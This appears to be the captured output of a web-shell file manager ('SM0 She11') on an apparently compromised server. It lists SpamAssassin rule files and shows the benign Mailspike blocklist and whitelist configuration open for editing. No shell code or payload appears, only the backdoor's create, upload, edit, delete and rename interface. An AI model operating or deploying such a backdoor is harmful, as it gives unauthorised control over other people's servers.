SM0 She11
Path:
/
/
usr
/
share
/
spamassassin
Full Path (server): /usr/share/spamassassin
Create Fil3
Upl04d Fil3
📄 10_default_prefs.cf
[E]
[D]
[R]
📄 10_hasbase.cf
[E]
[D]
[R]
📄 20_advance_fee.cf
[E]
[D]
[R]
📄 20_aux_tlds.cf
[E]
[D]
[R]
📄 20_body_tests.cf
[E]
[D]
[R]
📄 20_compensate.cf
[E]
[D]
[R]
📄 20_dnsbl_tests.cf
[E]
[D]
[R]
📄 20_drugs.cf
[E]
[D]
[R]
📄 20_dynrdns.cf
[E]
[D]
[R]
📄 20_fake_helo_tests.cf
[E]
[D]
[R]
📄 20_freemail.cf
[E]
[D]
[R]
📄 20_freemail_domains.cf
[E]
[D]
[R]
📄 20_head_tests.cf
[E]
[D]
[R]
📄 20_html_tests.cf
[E]
[D]
[R]
📄 20_imageinfo.cf
[E]
[D]
[R]
📄 20_mailspike.cf
[E]
[D]
[R]
📄 20_meta_tests.cf
[E]
[D]
[R]
📄 20_net_tests.cf
[E]
[D]
[R]
📄 20_phrases.cf
[E]
[D]
[R]
📄 20_porn.cf
[E]
[D]
[R]
📄 20_ratware.cf
[E]
[D]
[R]
📄 20_uri_tests.cf
[E]
[D]
[R]
📄 20_vbounce.cf
[E]
[D]
[R]
📄 23_bayes.cf
[E]
[D]
[R]
📄 25_accessdb.cf
[E]
[D]
[R]
📄 25_antivirus.cf
[E]
[D]
[R]
📄 25_asn.cf
[E]
[D]
[R]
📄 25_dcc.cf
[E]
[D]
[R]
📄 25_dkim.cf
[E]
[D]
[R]
📄 25_hashcash.cf
[E]
[D]
[R]
📄 25_pyzor.cf
[E]
[D]
[R]
📄 25_razor2.cf
[E]
[D]
[R]
📄 25_replace.cf
[E]
[D]
[R]
📄 25_spf.cf
[E]
[D]
[R]
📄 25_textcat.cf
[E]
[D]
[R]
📄 25_uribl.cf
[E]
[D]
[R]
📄 30_text_de.cf
[E]
[D]
[R]
📄 30_text_fr.cf
[E]
[D]
[R]
📄 30_text_it.cf
[E]
[D]
[R]
📄 30_text_nl.cf
[E]
[D]
[R]
📄 30_text_pl.cf
[E]
[D]
[R]
📄 30_text_pt_br.cf
[E]
[D]
[R]
📄 50_scores.cf
[E]
[D]
[R]
📄 60_adsp_override_dkim.cf
[E]
[D]
[R]
📄 60_awl.cf
[E]
[D]
[R]
📄 60_shortcircuit.cf
[E]
[D]
[R]
📄 60_whitelist.cf
[E]
[D]
[R]
📄 60_whitelist_dkim.cf
[E]
[D]
[R]
📄 60_whitelist_spf.cf
[E]
[D]
[R]
📄 60_whitelist_subject.cf
[E]
[D]
[R]
📄 72_active.cf
[E]
[D]
[R]
📄 72_scores.cf
[E]
[D]
[R]
📄 73_sandbox_manual_scores.cf
[E]
[D]
[R]
📄 STATISTICS-set0-72_scores.cf.txt
[E]
[D]
[R]
📄 STATISTICS-set1-72_scores.cf.txt
[E]
[D]
[R]
📄 STATISTICS-set2-72_scores.cf.txt
[E]
[D]
[R]
📄 STATISTICS-set3-72_scores.cf.txt
[E]
[D]
[R]
📄 languages
[E]
[D]
[R]
📄 local.cf
[E]
[D]
[R]
📄 regression_tests.cf
[E]
[D]
[R]
📄 sa-update-pubkey.txt
[E]
[D]
[R]
📄 sa-update.cron
[E]
[D]
[R]
📄 user_prefs.template
[E]
[D]
[R]
Editing: 20_mailspike.cf
# MailSpike is included in SpamAssassin 3.4+ if (version >= 3.004000) ifplugin Mail::SpamAssassin::Plugin::DNSEval ## Spam sources header __RCVD_IN_MSPIKE_B eval:check_rbl('mspikeb-lastexternal', 'bl.mailspike.net.') tflags __RCVD_IN_MSPIKE_B net ## Ham sources header __RCVD_IN_MSPIKE_L eval:check_rbl('mspikeg-firsttrusted', 'wl.mailspike.net.') tflags __RCVD_IN_MSPIKE_L net ##### Reputation compensations # Definitions - Bad senders header __RCVD_IN_MSPIKE_Z eval:check_rbl_sub('mspikeb-lastexternal', '127.0.0.2') describe __RCVD_IN_MSPIKE_Z Spam wave participant tflags __RCVD_IN_MSPIKE_Z net header RCVD_IN_MSPIKE_L5 eval:check_rbl_sub('mspikeb-lastexternal', '127.0.0.10') describe RCVD_IN_MSPIKE_L5 Very bad reputation (-5) tflags RCVD_IN_MSPIKE_L5 net header RCVD_IN_MSPIKE_L4 eval:check_rbl_sub('mspikeb-lastexternal', '127.0.0.11') describe RCVD_IN_MSPIKE_L4 Bad reputation (-4) tflags RCVD_IN_MSPIKE_L4 net header RCVD_IN_MSPIKE_L3 eval:check_rbl_sub('mspikeb-lastexternal', '127.0.0.12') describe RCVD_IN_MSPIKE_L3 Low reputation (-3) tflags RCVD_IN_MSPIKE_L3 net header RCVD_IN_MSPIKE_L2 eval:check_rbl_sub('mspikeb-lastexternal', '127.0.0.13') describe RCVD_IN_MSPIKE_L2 Suspicious reputation (-2) tflags RCVD_IN_MSPIKE_L2 net # Definitions - Good senders header RCVD_IN_MSPIKE_H5 eval:check_rbl_sub('mspikeg-firsttrusted', '127.0.0.20') describe RCVD_IN_MSPIKE_H5 Excellent reputation (+5) tflags RCVD_IN_MSPIKE_H5 nice net header RCVD_IN_MSPIKE_H4 eval:check_rbl_sub('mspikeg-firsttrusted', '127.0.0.19') describe RCVD_IN_MSPIKE_H4 Very Good reputation (+4) tflags RCVD_IN_MSPIKE_H4 nice net header RCVD_IN_MSPIKE_H3 eval:check_rbl_sub('mspikeg-firsttrusted', '127.0.0.18') describe RCVD_IN_MSPIKE_H3 Good reputation (+3) tflags RCVD_IN_MSPIKE_H3 nice net header RCVD_IN_MSPIKE_H2 eval:check_rbl_sub('mspikeg-firsttrusted', '127.0.0.17') describe RCVD_IN_MSPIKE_H2 Average reputation (+2) tflags RCVD_IN_MSPIKE_H2 nice net # *_L and *_Z may overlap each other, so account for that meta __RCVD_IN_MSPIKE_LOW RCVD_IN_MSPIKE_L5 || RCVD_IN_MSPIKE_L4 || RCVD_IN_MSPIKE_L3 tflags __RCVD_IN_MSPIKE_LOW net meta RCVD_IN_MSPIKE_ZBI __RCVD_IN_MSPIKE_Z && !__RCVD_IN_MSPIKE_LOW tflags RCVD_IN_MSPIKE_ZBI net ## Meta rules for aggregating good and bad senders # Bad meta RCVD_IN_MSPIKE_BL RCVD_IN_MSPIKE_L5 || RCVD_IN_MSPIKE_L4 || RCVD_IN_MSPIKE_L3 || __RCVD_IN_MSPIKE_Z describe RCVD_IN_MSPIKE_BL Mailspike blacklisted tflags RCVD_IN_MSPIKE_BL net # Good meta RCVD_IN_MSPIKE_WL RCVD_IN_MSPIKE_H5 || RCVD_IN_MSPIKE_H4 || RCVD_IN_MSPIKE_H3 describe RCVD_IN_MSPIKE_WL Mailspike good senders tflags RCVD_IN_MSPIKE_WL nice net endif endif
Save